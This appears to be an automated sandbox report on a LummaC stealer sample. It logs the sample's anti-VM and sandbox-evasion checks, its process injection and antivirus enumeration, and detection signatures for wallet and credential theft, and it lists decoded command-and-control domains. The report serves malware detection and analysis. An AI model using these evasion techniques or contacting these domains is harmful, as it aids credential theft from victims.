Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lumma_phothockey.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: lumma_phothockey.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: lumma_phothockey.exe, 00000000.00000002.1575625497.0000000006500000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000003F67000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: lumma_phothockey.exe, 00000000.00000002.1575625497.0000000006500000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000003F67000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.lumma_phothockey.exe.7370000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lumma_phothockey.exe.45509c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lumma_phothockey.exe.7370000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lumma_phothockey.exe.447118e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lumma_phothockey.exe.43f3140.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lumma_phothockey.exe.45509c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1578700374.0000000007370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1565730061.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lumma_phothockey.exe PID: 5416, type: MEMORYSTR

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064D9416 push es; retf	0_2_064D9418
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064DD016 pushfd ; retf	0_2_064DD035
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064D4B58 push es; retf	0_2_064D4BC0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662F75C push cs; iretd	0_2_0662F764
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662AF07 push edi; iretd	0_2_0662AF09
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662F7B5 push cs; iretd	0_2_0662F7B7
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B422 push edx; iretd	0_2_0662B423
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B431 push ecx; iretd	0_2_0662B433
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B402 push edx; iretd	0_2_0662B403
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B412 push edx; iretd	0_2_0662B413
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B362 push edx; iretd	0_2_0662B363
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B372 push edx; iretd	0_2_0662B373
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B342 push edx; iretd	0_2_0662B343
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B352 push edx; iretd	0_2_0662B353
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B3E1 push edx; iretd	0_2_0662B3E3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B3F2 push edx; iretd	0_2_0662B3F3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B3A2 push edx; iretd	0_2_0662B3A3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B3A9 push edx; iretd	0_2_0662B3D3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B382 push edx; iretd	0_2_0662B383
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0662B392 push edx; iretd	0_2_0662B393
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07286720 push FFFFFF8Bh; iretd	0_2_07286727
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072866D4 push FFFFFF8Bh; ret	0_2_072866D6
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07283518 push eax; retf	0_2_07283525
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07286848 push FFFFFF8Bh; iretd	0_2_0728684F
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072808E8 pushad ; retf 0723h	0_2_072808F5
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072840C1 push dword ptr [esp+ebp-75h]; iretd	0_2_072840CB
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A5F0A push eax; retf	0_2_072A5F11
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072ACFB0 push esp; retf	0_2_072ACFB1
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0736C701 pushfd ; ret	0_2_0736C719
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07366780 push 3C0725C4h; ret	0_2_07366785
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00450310 push eax; mov dword ptr [esp], 00030235h	4_2_00450314

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: lumma_phothockey.exe PID: 5416, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\lumma_phothockey.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\lumma_phothockey.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Memory allocated: 4F60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Window / User API: threadDelayed 1260			Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Window / User API: threadDelayed 2775			Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 6524	Thread sleep count: 1260 > 30	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 6524	Thread sleep count: 2775 > 30	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99762s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -99103s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -98229s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 644	Thread sleep time: -97895s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe TID: 1876	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99762	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99217	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 99103	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98451	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 98229	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Thread delayed: delay time: 97895	Jump to behavior

Source: lumma_phothockey.exe, 00000000.00000002.1577103994.0000000007090000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: NehgfS61cw
Source: lumma_phothockey.exe, 00000004.00000002.3760379544.000000000077C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxX{%SystemRoot%\system32\mswsock.dlln
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: lumma_phothockey.exe, 00000000.00000002.1550328158.0000000001242000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Code function: 4_2_0044ED60 LdrInitializeThunk,

4_2_0044ED60

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Memory written: C:\Users\user\Desktop\lumma_phothockey.exe base: 410000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: burnressert.shop

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Process created: C:\Users\user\Desktop\lumma_phothockey.exe "C:\Users\user\Desktop\lumma_phothockey.exe"

Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Queries volume information: C:\Users\user\Desktop\lumma_phothockey.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: lumma_phothockey.exe, 00000004.00000002.3760852223.0000000000817000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\lumma_phothockey.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: lumma_phothockey.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

